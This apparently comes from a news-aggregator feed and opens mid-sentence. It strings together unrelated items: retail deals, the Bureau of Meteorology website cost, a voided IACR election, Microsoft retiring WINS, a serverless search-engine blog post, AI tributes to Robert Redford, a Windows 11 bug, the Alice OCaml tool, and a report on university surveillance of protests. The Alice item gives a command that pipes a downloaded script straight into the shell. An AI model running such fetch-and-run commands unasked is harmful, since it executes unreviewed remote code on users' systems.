, this Bosch beauty now comes at a price offer you can’t refuse – and not just from Amazon. “A brilliant blend of robust form and function” wrote Rachel of this fashionably industrial-looking kettle, whose features include a low minimum boil (300ml), keep-warm setting and touch controls. Now its lowest price ever, in white or black.
One of your favourite Filter recommendations of the year, this gentle
sunrise alarm clock
will wake you up with kittens purring, birdsong, gently brightening light – or a plain old alarm sound if you prefer. It’s been around for a few years and saw a price hike in 2022 (cost-of-waking-up crisis?) before settling at just under £50 from most retailers, so this is a deal worth grabbing.
Water flosser
Waterpik Ultra Professional, from £59.99 (was £91)
Blast the gunk from your gums without having to grapple with floss. The Waterpik Ultra is a countertop model so it takes up more space than the cordless type, but this gives it more versatility and saw it score top marks with our
water flosser
tester Alan Martin. If you’d rather avoid Amazon, you can find it discounted by other retailers, albeit not by as much.
The best IPL device
Philips Lumea 9900 BRI951/01, £
377.99 (avg £501.33)
IPL (intense pulsed light) hair remover devices promise to banish stubbly regrowth without the pain of waxing and epilation – at a price. The Philips Lumea 9900, Lise Smith’s pick for
best IPL device
overall, has cost as much as £599.99 for much of the year, and occasional discounts rarely go below £450. Amazon’s current price shaves more than £40 off any other Black Friday deal we’ve found for this version, which comes with four attachments.
The best beauty deals
A bargain beauty Advent calendar
W7 Beauty Blast Advent calendar, £16.95 (was £19.95)
Advent calendars are a Christmas staple, and we’ve seen lots of brands try to put a different spin on them in the past – beauty Advent calendars are some of the most prominent. This W7 Beauty Blast calendar provides excellent value for money at a deal-busting £16.95 from Amazon, especially as it provides genuinely useful products for most folks. The likes of the eyeshadows, primers, lip balms and such are travel-size, but apart from that, Sarah Matthews had little cause for complaint in her ranking of the
best beauty Advent calendars
.
Trade Chaos Causes Businesses to Rethink Their Relationship with the U.S.
The Bureau of Meteorology's (BOM) flawed and expensive redesigned website will come under renewed scrutiny, with the federal environment minister asking the agency's new boss to closely examine how it all went so wrong, and report back to him.
It comes amid revelations that the new website cost more than $96 million to design — a far cry from the $4 million figure it originally claimed had been spent.
Users found it difficult to navigate, and also criticised the
changes to the radar map
, which made place names hard to read.
BOM users, farmers in particular, were critical of the changes made to the radar map.
(
ABC Rural: Justine Longmore
)
Farmers were scathing, as they were unable to locate rainfall data.
The federal government was forced to intervene, ordering the agency to fix the website.
The site has since reverted to the old version of the radar map and other tweaks have been made to the site, with further changes to be rolled out.
In a statement provided to the ABC, the BOM admitted "the total cost of the website is approximately $96.5 million".
'Complete rebuild necessary'
It said the cost breakdown included $4.1 million for the redesign, $79.8 million for the website build, and the site's launch and security testing cost $12.6 million.
"A complete rebuild was necessary to ensure the website meets modern security, usability and accessibility requirements for the millions of Australians who reply on it every day," a spokesperson said.
The spokesperson also said it had "continued to listen to and analyse community feedback" since the launch of the new website on October 22.
The BOM says it continues to listen to and analyse community feedback.
(
ABC News: Greg Bigelow
)
Nine days after the launch it changed the radar map back to what it had previously been.
"This brought back the visual style that the community said they found intuitive and reliable for interpreting weather conditions,"
a spokesperson said.
"This option was already available on the new site but not as the default setting when visiting the page.
"On 7 November we implemented changes to help the community find important fire behaviour index information."
Future changes were also in the pipeline in response to community feedback, according to the spokesperson, but some updates had been paused due to Severe Tropical Cyclone Fina in northern Australia.
Minister's expectations 'have been made very clear'
Environment Minister Murray Watt said he had met twice in the past week with the new CEO Stuart Minchin to reiterate his concerns about the bungled process and the cost.
The environment minister says he has met twice with the BOM's new boss.
(
ABC News: Callum Flinn
)
He has asked Mr Minchin to report back to him on the issue.
"I don't think it's secret that I haven't been happy with the way the BOM has handled the transition to the new website," he told reporters on Sunday.
"I met with him on his first day and during the week just gone, to outline again that I think the BOM hasn't met public expectations, both in terms of the performance of the website and the cost of the website.
"So I've asked him as his first priority to make sure that he can get on top of the issues with the website — the functionality — and I'm pleased to see they've made changes.
"But I've also asked him to get on top of how we got to this position with this cost, with the problems.
"He's only been in the job for a week but I think my expectations have been made very clear."
The minister has asked new BOM boss, Stuart Minchin, to prioritise the issues with the website.
(
Supplied: BOM
)
However the minister stopped short of describing the website as a sheer waste of money, saying he would wait to hear back from Mr Minchin before commenting.
"Before leaping to judgement, I want to see what the new CEO of the BOM has been able to establish as to the reasons for those cost increases and I'll make my judgement at that point in time."
'Another Labor disaster'
Nationals leader David Littleproud said there should be "consequences" after the revelations about the true cost of the website.
"It is unbelievable a private consultancy was paid $78 million to redesign the website," Mr Littleproud said.
"But then security and system testing meant that Australian taxpayers actually paid $96 million for what was nothing more than another Labor disaster,.
"The seriousness of this cannot be understated. This isn't just about a clunky website, the changes actually put lives and safety at risk.
"The new platform did not allow people to enter GPS coordinates for their specific property locations, restricting searches to towns or postcodes.
"Families and farmers could not access vital, localised data such as river heights and rainfall information and this missing data created panic and fear across communities.
"But now, the fact the BOM has been hiding the true cost of its white elephant and initially lying about the total figure is deeply concerning, considering that the BOM should be all about trust."
IACR Nullifies Election Because of Lost Decryption Key
Schneier
www.schneier.com
2025-11-24 12:03:46
The International Association of Cryptologic Research—the academic cryptography association that’s been putting conferences like Crypto (back when “crypto” meant “cryptography”) and Eurocrypt since the 1980s—had to nullify an online election when trustee Mot...
The International Association of Cryptologic Research—the academic cryptography association that’s been putting conferences like Crypto (back when “crypto” meant “cryptography”) and Eurocrypt since the 1980s—had to
nullify
an online election when trustee Moti Yung lost his decryption key.
For this election and in accordance with the bylaws of the IACR, the three members of the IACR 2025 Election Committee acted as independent trustees, each holding a portion of the cryptographic key material required to jointly decrypt the results. This aspect of Helios’ design ensures that no two trustees could collude to determine the outcome of an election or the contents of individual votes on their own: all trustees must provide their decryption shares.
Unfortunately, one of the three trustees has irretrievably lost their private key, an honest but unfortunate human mistake, and therefore cannot compute their decryption share. As a result, Helios is unable to complete the decryption process, and it is technically impossible for us to obtain or verify the final outcome of this election.
The group will redo the election, but this time setting a 2-of-3 threshold scheme for decrypting the results, instead of requiring all three
Microsoft to remove WINS support after Windows Server 2025
Bleeping Computer
www.bleepingcomputer.com
2025-11-24 11:47:01
Microsoft has warned IT administrators to prepare for the removal of Windows Internet Name Service (WINS) from Windows Server releases starting in November 2034. [...]...
Microsoft has warned IT administrators to prepare for the removal of Windows Internet Name Service (WINS) from Windows Server releases starting in November 2034.
The legacy
WINS
computer name registration and resolution service has been deprecated
with the release of Windows Server 2022
in August 2021, when Microsoft stopped active development and working on new features.
Windows Server 2025 will be the final Long-Term Servicing Channel release to come with WINS support, with the feature to be removed from future releases.
"WINS was officially deprecated since Windows Server 2022 and will be removed from all Windows Server releases following Windows Server 2025,"
Microsoft announced
on Friday.
"Standard support will continue through the lifecycle of Windows Server 2025, until November 2034. We encourage you to migrate to modern Domain Name System (DNS)-based name resolution solutions before then."
Once removal takes effect, Windows Server will no longer include the WINS server role, the WINS management console snap-in, the WINS automation APIs, and related interfaces.
Microsoft highlighted several reasons for eliminating WINS support, including DNS's superior scalability and compliance with modern internet standards, and it noted that DNSSEC provides security protections against cache poisoning and spoofing attacks that WINS/NetBIOS cannot mitigate.
It also added that modern Microsoft services, including Active Directory, cloud platforms, and Windows APIs, rely on DNS for name resolution.
Organizations still dependent on WINS are advised to immediately begin auditing services and applications that still rely on NetBIOS name resolution and migrate to DNS with conditional forwarders, split-brain DNS, or search suffix lists to replace WINS functionality.
Microsoft also cautioned against temporary workarounds such as static host files, saying they don't scale and aren't sustainable for enterprise environments.
"Now is the time to review dependencies, evaluate DNS migration plans, and make informed decisions," Microsoft noted.
"Organizations relying on WINS for NetBIOS name resolution are strongly encouraged to begin migration planning immediately to avoid disruptions."
As MCP (Model Context Protocol) becomes the standard for connecting LLMs to tools and data, security teams are moving fast to keep these new services safe.
This free cheat sheet outlines 7 best practices you can start using today.
I put a search engine into a Lambda, so you only pay when you search
Modern serverless search is just an accounting trick. There’s a hidden pool of nodes behind the API, and the final bill is split evenly among all clients. There’s always a standby warm node waiting for your request - you just don’t see it.
And you can’t get rid of it because scaling search engines is HARD (or at least search vendors want you to think so). You can’t just put one into a Lambda function. But what if you actually can?
As someone who has hated Elasticsearch since version 0.89 (but still uses it), there are three major blockers to running it in a truly serverless mode:
Container size
: It’s around 700MB in version 9.x. The bigger the container, the slower the node startup, since it has to be pulled from somewhere.
Container startup time
: For ES 9.x, the startup time alone is about 40 seconds. And the time-to-performance is much worse, since a cold JVM is painfully slow until it sees some traffic.
Index and state
: Search engines like Elastic and Qdrant behave like databases, with each node hosting a fraction of the total cluster state. When a new node joins, the cluster needs to rebalance. What happens if you scale-to-zero? Better not ask.
We’re going to take my pet-project-gone-big search engine,
Nixiesearch
, and squeeze it into an
AWS Lambda
:
It’s also JVM-based, since it uses
Apache Lucene
for all search-related internals (Like OpenSearch, Elasticsearch and SOLR).
We’re going to build a native x86_64 binary with
GraalVM native-image
: this should reduce the Docker image size (no JVM!) and eliminate JVM warmup entirely.
Can we store an index outside the search engine?
Can we achieve reasonable latency with
AWS S3
? What if we host the index on
AWS EFS
instead?
You may wonder why do we ever need to perform weird AWS Lambda tricks when we can just keep the status quo with warm stand-by nodes? No warm-up, no cold-start, no obscure limits - it’s a good traditional approach.
Because doing weird stupid things is the way I learn. So the challenge is to have a proof-of-concept which:
Has minimal startup time
, so scale up-down won’t be an issue. With sub-second startup you can even
scale to zero
when there’s no traffic!
Search latency is going to be reasonably fast
. Yes modern search engines compete on 3 vs 5 milliseconds, but in practice you also have an chonky embedding model, which adds extra 300-400ms latency on top.
Java AOT compilation and remote index storage, sounds easy.
GraalVM native-image
is an Ahead-Of-Time compiler: it takes a JVM application JAR file and builds an almost zero-dependency native binary that depends only on
glibc
. It sounds fancy in theory, but in practice not all applications can be statically compiled that easily.
Accessing field reflectively in Java. If you do this, you probably doing something wrong.
If you (or your transitive dependencies) use reflection to do something dynamic like enumerating class fields or loading classes dynamically, then GraalVM requires you to create a
reflection-config.json
file listing all the nasty things you do.
Example of reflect-config.json
Building such a file manually for all transitive dependencies is practically impossible. But in modern GraalVM versions you can attach a tracing agent to your application, which records all the nasty things happening throughout the entire codebase.
The tracing agent needs to observe all execution paths in your application, and instead of sending all possible search requests manually, I just attached it to the test suite — and got a monumental
reachability-metadata.json
file that hopefully covers all reflection usage in transitive dependencies.
It’s time to build our first native binary!
A real native-image command-line.
It takes around two minutes on my 16-core AMD Zen 5 CPU to compile the binary, which is impressively slow. With an
ubuntu:24.04
minimal base image we get 338MB — a nice reduction from 760MB.
The musl-based binary ends up at the same
244MB
, but now it can run natively on Alpine without the
gcompat
glibc layer. But can we go even further and build the app completely statically, without linking libc at all? Once you start trimming dependencies, it’s hard to stop.
Now we’re at
248MB
, but we no longer need a base system at all - which gives us the most perfect Docker image ever:
FROM scratch
COPY --from=builder /build/nixiesearch /nixiesearch
ENTRYPOINT /nixiesearch
We could go even further and enable the
-Os
option to optimize for size, but I’m afraid it might impact request processing performance.
How I went from 760MB docker image to just 205MB.
GraalVM also notes that almost 30% of the codebase is taken up by the AWS Java SDK with its massive dependency footprint, so the next step is switching to the raw S3 REST API instead of the nice SDK helpers.
I originally thought that AWS Lambda runtime for Docker is just a simple “docker pull” and “docker run” on each request,
but it’s slightly more complex
:
Lambda API request lifecycle.
On initial code deployment, the container gets fetched from ECR, unpacked and cached on all AWS AZ where your lambda is scheduled to run.
When first request arrives, the container goes in to the
Init
stage
: it gets executed on a minimal Firecracker VM. The Lambda runtime waits until started container polls runtime API for the actual request to process.
This stage is billed, so we need to be as fast as possible here.
Request stage
: container polls runtime API for request and produces the response. This is where the actual work happens, and this is the part you’re also billed for.
And here the MAGICAL
Freeze stage
: After the Lambda API receives a response and sees that the app starts polling for the next request, the VM gets frozen. It’s still a VM, but with zero CPU and its RAM offloaded to disk. You pay
zero
for a container in the freeze stage.
When there’s a new request arrives, container VM gets into
Thaw stage
: unfrozen, processes the next request and so on to get frozen again.
When there are no requests arriving for a longer period of time (in practice 5-15 minutes), lambda container gets destroyed.
Cold request (full init):
Duration: 84.15 ms
Billed Duration: 535 ms
Memory Size: 3008 MB
Max Memory Used: 133 MB
Init Duration: 449.85 ms
Warm request (after freeze-thaw cycle):
Duration: 2.62 ms
Billed Duration: 3 ms
Memory Size: 3008 MB
Max Memory Used: 194 MB
That’s nice: we were able to spin the cold container
in only 449ms
, and warm no-op requests are just
3ms!
But note that AWS Lambda compute is very limited:
RAM
: 128MB default with up to 3008MB max. You can submit a support ticket to get 10GB RAM, but I was too lazy to argue with AWS support.
vCPU
: 1 vCPU, and if you go beyond 1536MB of RAM, you get 2nd vCPU. Not much.
Disk
: up to 10GB of instance storage.
And last but not the least, S3 read throughput depends on RAM size:
S3 throughput data is well aligned
with known S3 throughput limits for AWS EC2 instances
. Assuming that we have only 2 vCPU max, 100MB/s is the best you can expect - which is not nice considering that to run search we need to access the index.
Nixiesearch always was built with S3 block storage in mind. But as OpenSearch (and perhaps Elasticsearch Serverless) it uses S3 only for simple segment replication:
Segment replication with AWS S3.
As lambdas are ephemeral, we need to deliver index somehow to the search engine:
We can
directly wrap all Lucene index access into S3 ReadObject
calls. This might work, but HNSW vector search is an iterative graph traversal, which will ruin the latency. Slow (and expensive due to ~500 S3 reads per request) search, but no init time. But it sounds serverless!
We can do a good old
segment replication from S3 to Lambda ephemeral storage
. Then for a 2GB index and expected 100MB/s throughput our init time is going to be 2GB * 0.1GB/s = 20 seconds. But after that the search speed is going to be perfect with no extra costs.
Napkin storage costs math for 1M requests:
Direct S3 search with no caching
: 500 S3 reads per request * 1M requests * 0.0004$/1000reads =
200$/month.
Yes running an ES cluster is more expensive, but not much.
Segment replication
: considering that 1M requests/month is around 0.5rps, it means that your lambda function is going to be always warm and there’s no repeated inits - you fetch the index once and only refresh changed segments.
Then the cost is going to be around 0$
.
I don’t like the idea of an init taking half a minute - then we’re not much different from good old Elastic. But what if we host an index on an NFS (e.g. AWS EFS) storage?
AWS EFS
: 1MB data read per search request * 1M requests * 0.03$/GB =
30$/month
. Now math makes more sense: we have zero init time, but have extra latency for all disk access.
I took the FineWiki “simple” part with 300k documents, embedded them with
OpenAI text-embedding-3-small
model and deployed it on an AWS Lambda with EFS storage attached.
Blue gradient background is like an em-dash of vibe-coded front-ends.
There’s some nice server+client side latency breakdown if you want to see where the actual time is spent. And yes, 1.5s first request latency is kinda slower than I’ve initially expected.
In simple words, random reads from NFS-style storage are just slow:
breakdown of a sample request
As my test lambda runs in AWS us-east-1 and I’m physically in EU, latency can be improved by replicating lambda to more regions. Embedding latency is the AI toll we have to pay anyway. But why search and fetch stages are so slow?
One of reviewers of this post suggested to bake the whole index directly to the docker image as an alternative: yes, you cannot easily update the index in real-time anymore - you need to rebuild the Docker image from scratch every time you change it. But it may work in cases when you can tolerate some lag in indexing. But the results we got were even more surprising:
When you thought AWS EFS was slow, you should try baking index into docker image.
I thought 1.5s request latency with AWS EFS was slow, but doing random reads across an index backed directly to the docker image were even slower. Why? Because lambdas are not running docker images as-is: they unpack them and cache in an AZ-local S3 block cache:
In other words, baking index into a docker image is just another way of storing your index on AZ-local S3-Express bucket (and mounting it with s3-fuse or something).
Realistically 1.5s (and even 7s) per cold search might sound horrible, but things get fast pretty quickly as we eventually load cold data into a filesystem cache:
Image above is for Docker-bundled index, but for EFS/NFS attached it’s quite similar.
We get into a reasonable 120ms latency for search and almost instant field fetch around request #10. But it’s still far from the idealistic idea of true serverless search when you don’t need an idling warm node to be up to serve your request.
Folks like
turbopuffer
,
topk
and
LanceDB
advocate the idea that to run on top of S3 you need another non-HNSW data structure like
IVF
, which is more friendly to high access latency.
Instead of navigating over HNSW graph, iteratively doing ton of random reads, you can just cluster documents together and only perform batch reads of clusters lying nearby to your query:
Much easier search implementation
without any iterative random reads patterns: just read a complete set of cluster documents in a single S3 GetObject request.
Clusters can be updated in-place
by just appending new documents.
The elephant in the room:
IFV have much much worse recall,
especially for filtered search. So your search can be either fast or precise, you should choose in advance.
Yes I can just hack IFV support to Nixiesearch (as Lucene supports flat indexes already), but there’s a better way. S3 has almost unlimited concurrency: can we untangle reads from being iterative to being batched and concurrent?
Traversing HNSW graph for K-NN search is iterative:
You land on an entrypoint node, which has M connections to other neighbor nodes.
For each connection, you load its embedding (and do S3 GetObject request) and compute a cosine distance.
After all M neighbor distances are evaluated, you jump on the best next node.
Sequential reads, oh no!
But you don’t need to be iterative while loading neighbor embeddings: Lucene’s HnswGraphSearcher is already quite close to be bend into the direction for making embedding load concurrent and parallel:
So my personal plan for Christmas holidays is to add a custom Scorer implementation which schedules N parallel
S3 GetObject
requests to get N embeddings on each node visit:
HNSW graph usually has only ~3 layers, so you need to evaluate 1 entrypoint + 3 layers = 4 nodes, doing 4 batches of ~32-64 S3 requests.
Each batch of S3 GetObject requests is ~15ms, so baseline latency is expected to be ~60ms for a complete search stage.
To fetch N documents, you also need to prefetch N chunks of stored fields, which is also a perfectly concurrent operation.
A theoretical ~100ms baseline latency of HNSW running on top of S3 - sounds nice, huh?
Usually at the end of the article a well-educated author should put a summary of what you might learned while reading this, so here we are:
AWS Lambdas are not your friendly docker containers: storage system is completely different, and runtime semantics with constant freeze-thaw stages is what really surprised me.
Running HNSW search on top of network-attached storage is painfully slow right now - sequential random reads, you know. But there’s light at the end of the tunnel, and you don’t need to sacrifice recall for a cheap and fast search.
If you’re brave (and stupid) enough (like me) to spend a weekend on putting a search engine in a lambda, you can do it.
‘Extra challenging during a difficult time’: Robert Redford’s daughter criticises AI tributes to the late actor
Guardian
www.theguardian.com
2025-11-24 11:04:46
Amy Redford thanks fans for ‘love and support’ but takes issue with ‘AI versions of funerals, tributes and quotes from members of my family that are fabrications’ Robert Redford’s daughter Amy Redford has criticised the proliferation of artificial intelligence tributes to her father, who died in Sep...
Robert Redford’s daughter Amy Redford has criticised the proliferation of artificial intelligence tributes to her father,
who died in September
, calling them “fabrications”.
Redford posted a statement on social media
in which she thanked fans for their “overwhelming love and support”, adding: “It’s clear that he meant so much to so many, and I know that my family is humbled by the outpouring of stories and tributes from all corners of the globe.”
She went on to say: “There have been multiple AI versions of funerals, tributes and quotes from members of my family that are fabrications. Renderings of my dad who clearly has no say, and depictions of my family that do not represent anyone in a positive light are extra challenging during a difficult time.”
Redford said that no public funeral has taken place, and that a memorial to her father’s life is still being planned, saying: “Every family should have the ability to mourn, represent the person they lost, and pay homage in the way that fits their values and family culture best.”
Redford added: “My hope is to keep AI in the land of transparent usage where it belongs. There are many elements of it that were created with good intent. I simply ask, what if this was you? Let that be your guidepost.”
The Attention Economy Navigator, November 2025 w/ Nima Shirazi
OrganizingUp
convergencemag.com
2025-11-24 11:00:00
This week on the show we are debuting a new format we’re calling the Attention Economy Navigator. The goal of Block & Build has always been to help organizers figure out what’s happening, how people are responding, and get a sense for what’s working out there in the world. The Attention Economy ...
Microsoft: Windows 11 24H2 bug crashes Explorer and Start Menu
Bleeping Computer
www.bleepingcomputer.com
2025-11-24 10:41:50
Microsoft has confirmed a critical Windows 11 24H2 bug that causes the File Explorer, the Start Menu, and other key system components to crash after installing cumulative updates released since July 2025. [...]...
Microsoft has confirmed a critical Windows 11 24H2 bug that causes the File Explorer, the Start Menu, and other key system components to crash after installing cumulative updates released since July 2025.
This bug affects users who log in after applying the cumulative updates and those using non-persistent operating system installations (such as virtual desktop infrastructure environments), where app packages must reinstall each session. On impacted systems, it causes issues for multiple essential Windows 11 shell components when XAML dependency packages fail to register properly after updates.
As Microsoft explained in a recent support document, applications that depend on XAML packages (specifically MicrosoftWindows.Client.CBS, Microsoft.UI.Xaml.CBS, and MicrosoftWindows.Client.Core) aren't registering in time after an update is installed, a timing issue that cascades through the system, preventing critical interface components from initializing properly.
This causes shell components such as Explorer.exe, StartMenuExperienceHost, and ShellHost.exe to crash with visible errors or fail silently, leaving users with partially functional systems that cannot display various navigation tools.
Affected users can experience a wide range of problems, including Start menu crashes (often accompanied by critical error messages), missing taskbars even when Explorer.exe is running, the core ShellHost (Shell Infrastructure Host or Windows Shell Experience Host) system process crashing, and the Settings app silently failing to launch.
"After provisioning a PC with a Windows 11, version 24H2 monthly cumulative update released on or after July 2025 (KB5062553), various apps such as StartMenuExperiencehost, Search, SystemSettings, Taskbar or Explorer might experience difficulties,"
Microsoft said
.
"The applications have dependency on XAML packages that are not registering in time after installing the update. We are working on a resolution and will provide more information when it is available."
Temporary workaround available
Microsoft stated it's developing a resolution but hasn't provided a timeline for the fix. While Microsoft continues to work on a permanent fix, it has provided PowerShell commands to manually register the missing packages.
Affected users must run these three Add-AppxPackage commands targeting each affected XAML package, then restart the system to restore functionality:
However, the bug particularly impacts organizations managing non-persistent enterprise environments using virtual desktop infrastructure, where employees must re-provision applications at each login.
For them, Microsoft recommends
running this logon script
on non-persistent OS installations that will execute before Explorer launches. The batch file wrapper ensures required packages are fully provisioned before the desktop environment loads, preventing the timing race condition.
It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.
Learn how top leaders are turning investment into measurable impact.
What are you doing this week?
Lobsters
lobste.rs
2025-11-24 10:10:21
What are you doing this week? Feel free to share!
Keep in mind it’s OK to do nothing at all, too....
Alice is a radical, experimental
OCaml
build system and
package manager. Its goal is to allow anyone to
program in OCaml with as little friction as possible.
Install Alice by running the following command:
curl -fsSL https://alicecaml.org/install.sh | sh
Alternatively, see more installation options
here
.
Here’s how to run your first OCaml program on a computer with no pre-installed
OCaml tools (you will need a C compiler though!):
$ alice tools install
$ alice new hello
$ cd hello
$ alice run
Hello, World!
That first line downloads an OCaml compiler toolchain and a couple of
development tools (
ocamllsp
and
ocamlformat
). Skip it if you already have
an existing installation of OCaml. Alice runs the OCaml compiler
(
ocamlopt.opt
) searching the directories in your
PATH
variable and only
uses its own installation of the tools (installed by
alice tools install
) as
a fallback.
This project is exploring alternative approaches to OCaml packaging than those
chosen by
Opam
and alternative approaches to
building projects than those chosen by
Dune
.
How Corporate Partnerships Powered University Surveillance of Palestine Protests
Intercept
theintercept.com
2025-11-24 10:00:00
Officials at the University of Houston used Dataminr to surveil students, while University of Connecticut administrators voiced concerns over protests against a military contractor and major donor.
The post How Corporate Partnerships Powered University Surveillance of Palestine Protests appeared fir...
A cluster of tents
had sprung up on the University of Houston’s central lawn. Draped in keffiyehs and surrounded by a barricade of plywood pallets, students stood on a blue tarp spread over the grass. Tensions with administrators were already high before students pitched their tents, with incidents like pro-Palestine chalk messages putting university leaders on high alert.
What the students didn’t know at the time was that the University of Houston had contracted with Dataminr, an artificial intelligence company with a
troubling record
on
constitutional rights
, to gather open-source intelligence on the student-led movement for Palestine. Using an AI tool known as “First Alert,” Dataminr was scraping students’ social media activity and chat logs and sending what it learned to university administration.
This is the first detailed reporting on how a U.S. university used the AI technology to surveil its own students. It’s just one example of how public universities worked with private partners to surveil student protests, revealing how corporate involvement in higher education can be leveraged against students’ free expression.
This is the final installment in an investigative series on the draconian surveillance practices that universities across the country employed to crack down on the 2024 pro-Palestine encampments and student protests. More than 20,000 pages of documentation covering communications from April and May 2024, which The Intercept obtained via public records requests, reveal a systematic pattern of surveillance by U.S. universities in response to their students’ dissent. Public universities in California tapped
emergency response funds for natural disasters
to quell protests; in Ohio and South Carolina, schools received briefings from
intelligence-sharing fusion centers
; and at the University of Connecticut, student participation in a protest sent administrators into a frenzy over what a local military weapons manufacturer would think.
The series traces how universities, as self-proclaimed safe havens of free speech, exacerbated the preexisting power imbalance between institutions with
billion-dollar endowments
and a nonviolent student movement by cracking down on the latter. It offers a preview of the crackdown to come under the Trump administration as the president re-entered office and
demanded
concessions
from U.S. universities
in an attempt to limit pro-Palestine dissent on college campuses.
“Universities have a duty of care for their students and the local community,” Rory Mir, associate director of community organizing at the Electronic Frontier Foundation, told The Intercept. “Surveillance systems are a direct affront to that duty for both. It creates an unsafe environment, chills speech, and destroys trust between students, faculty, and the administration.”
At the University of Houston, the encampment was treated as an unsafe environment. University communications officials using Dataminr forwarded the alerts — which consist of an incident location and an excerpt of the scraped text — directly to the campus police. One alert sent by Dataminr to a University of Houston communications official identified a potential pro-Palestine incident based on chat logs it scraped from a semi-private Telegram channel called “Ghosts of Palestine.”
“University of Houston students rise up for Gaza, demanding an end to Genocide,” the chat stated. First Alert flagged it as an incident of concern and forwarded the information to university officials.
According to Dataminr’s marketing materials, First Alert is designed for use by first responders, sending incident reports to help law enforcement officials gather situational awareness. But instead of relying on officers to collect the intelligence themselves, First Alert relies on Dataminr’s advanced algorithm to gather massive amounts of data and make decisions. In short, Dataminr’s powerful algorithm gathers intelligence, selects what it views to be important, and then forwards it to the paying client.
A follow-up public records request sent to the University of Houston returned records of more than 900 First Alert emails in the inbox of a university administrator, only in April 2024.
The AI company has been implicated in a number of scandals, including the domestic surveillance of
Black Lives Matter protesters
in 2020 and
abortion rights protesters
in 2023. The Intercept
reported
in April that the Los Angeles Police Department used First Alert to monitor pro-Palestine demonstrations in LA. First Alert is one, but not the only, service that Dataminr offers. For newsrooms to corporate giants, Dataminr’s powerful algorithms power intelligence gathering and threat response for those willing to pay.
“It’s concerning enough when you see evidence of university officials scrolling through individual student social media, that’s going to chill people’s speech,” said Nathan Wessler, deputy director of the ACLU’s Speech, Privacy, and Technology Project. “But it’s a whole other level of concern when you start contracting with these companies that are using some kind of algorithm to analyze, at scale, people’s speech online.”
The University of Houston and Dataminr did not respond to multiple requests for comment.
While the University
of Houston leaned on Dataminr to gather intelligence on the student-led movement for Palestine, it is just one example of the open-source intelligence practices used by universities in the spring of 2024. From screenshots of students’ Instagram posts to the use of on-campus surveillance cameras, the documents obtained by The Intercept illustrate how the broadening net of on-campus intelligence gathering swept up constitutionally protected speech in the name of “social listening.”
University communications officials were often left to do the heavy lifting of hunting down activists’ social media accounts to map out planned demonstrations. Posts by local Students for Justice in Palestine chapters of upcoming demonstrations were frequently captured by administrators and forwarded on. In other cases, university administrators relied on in-person intelligence gathering.
One set of communication in the documents suggests that at one point, University of Connecticut administrators were watching the students in the on-campus encampment sleep. “They are just beginning to wake up. It’s still very quiet. Just a couple of police cars nearby,” a UConn administrator wrote to other officials that April.
U.S. universities, faced with the largest student protest movement in decades, used open-source intelligence to monitor the student-led movement for Palestine and to inform whether or not they would negotiate, and eventually, how they would clear the encampments. Emily Tucker, the executive director of the Center on Privacy and Technology at Georgetown Law, situated the development as part of the broader corporatization of U.S. higher education.
“ Institutions that are supposed to be for the public good are these corporate products that make them into vehicles for wealth extraction via data products,” Tucker told The Intercept. “Universities are becoming more like for-profit branding machines, and at the same time, digital capitalism is exploding.”
At UConn, the relationship between the corporate world and higher education led to a brief panic among university administrators. After protesters, including members of UConn’s chapter of Students for Justice in Palestine and a campus group called Unchained,
blocked access
to a military aircraft manufacturing facility about 25 miles from campus, administrators went into a frenzy over what the military contractor would think.
“Ok. The P&W CEO is pretty upset with us about it right now and is pressing [University President] Radenka [Maric] for action,” wrote Nathan Fuerst to Kimberly Beardsley-Carr, both high-level UConn administrators. “Can you see if UConn PD can proactively reach out? If we can determine that no UConn Students were arrested, that would be immensely helpful.”
Fuerst was referring to a contractor for the Israeli military called Pratt & Whitney, a subsidiary of the $235 billion company formerly known as Raytheon — and a major UConn donor. Both UConn and Pratt & Whitney denied that the request occurred, pointing out that the military contractor has no CEO. Fuerst, Beardsley-Carr, and Maric did not respond to requests for comment.
Photo Illustration: Fei Liu / The Intercept
Beardsley-Carr, in her own email sent four minutes after Fuerst’s, repeated the request: “As you can see below, the President is getting pressure from the CEO of Pratt and Whitney.”
Whether the company made the request or if it was, as UConn spokesperson Stephanie Reitz told The Intercept, “a misunderstanding,” it’s clear from the communications that UConn administrators were concerned about what the weapons manufacturer would think — and sprang to action, gathering information on students because of it.
Pratt & Whitney has donated millions of dollars to various university initiatives, and in April 2024, the same month as the protest, it was announced that a building on campus would be rededicated as the “Pratt & Whitney Engineering Building.” A partnership between the school and the company received an honorable mention from the governor’s office, prompting a Pratt & Whitney program engineer to write in an email: “It’s wonderful! P&W and UCONN have done some great things together.”
After a flurry of emails over the Pratt & Whitney arrests, on April 25, the UConn administrators’ concerns were lifted. “Middletown PD provided me with the names of the 10 individuals arrested during the below incident. None of the arrestees are current students,” UConn Police Lieutenant Douglas Lussier wrote to Beardsley-Carr.
“You have no idea how happy you just made me,” Beardsley-Carr wrote back.
It’s not just UConn, but U.S. higher education as a whole that has a deep and long-standing relationship with military weapons manufacturers. Whether it is endowed professorships, “Lockheed Martin Days,” defense industry presence at career fairs, or private donations, the defense industry
has a hold
on U.S. higher education, especially at elite universities, which serve as training grounds for high-paying and influential careers.
“These universities are the epicenter, the home base, of the future generation of Americans, future policy makers,” said Tariq Kenney-Shawa, Al-Shabaka’s U.S. Policy Fellow. If universities “were so confident in Israel’s narrative and their narrative being the correct one,” Kenney-Shawa added, “they would let that debate in such important spaces play out.”
Some students who spoke with The Intercept
emphasized that as a result of the surveillance they encountered during the protests, they have stepped up their digital security, using burner phones and limiting communication about potential demonstrations to secure messaging channels.
“ The campus is waiting and watching for these kinds of things,” said Kirk Wolff, a student at the University of Virginia who said he was threatened with expulsion for a
one-man sit-in
he staged on campus and expressed fear that university administrators would read his emails.
The surveillance had a “chilling effect,” in his experience, Wolff said. “ I had so many people tell me that they wanted to join me, that they agreed with me, and that they simply could not, because they were scared that the school would turn over their information.”
The University of Virginia did not respond to a request for comment on Wolff’s claims.
The surveillance detailed in this investigation took place under the Biden administration, before Trump returned to power and dragged the crackdown on pro-Palestine dissent into the open. Universities have since
shared employee and student files
with the Trump administration as it continues to investigate “anti-Semitic incidents on campus” — and use the findings as pretext to defund universities or even target students for illegal deportation.
Any open-source intelligence universities gathered could become fair game for federal law enforcement agencies as they work to punish those involved in the student-led movement for Palestine, Mir noted.
“A groundwork of surveillance has been built slowly on many college campuses for decades,” he said. “Now very plainly and publicly we have seen it weaponized against speech.”
Research support provided by the nonprofit newsroom Type Investigations.
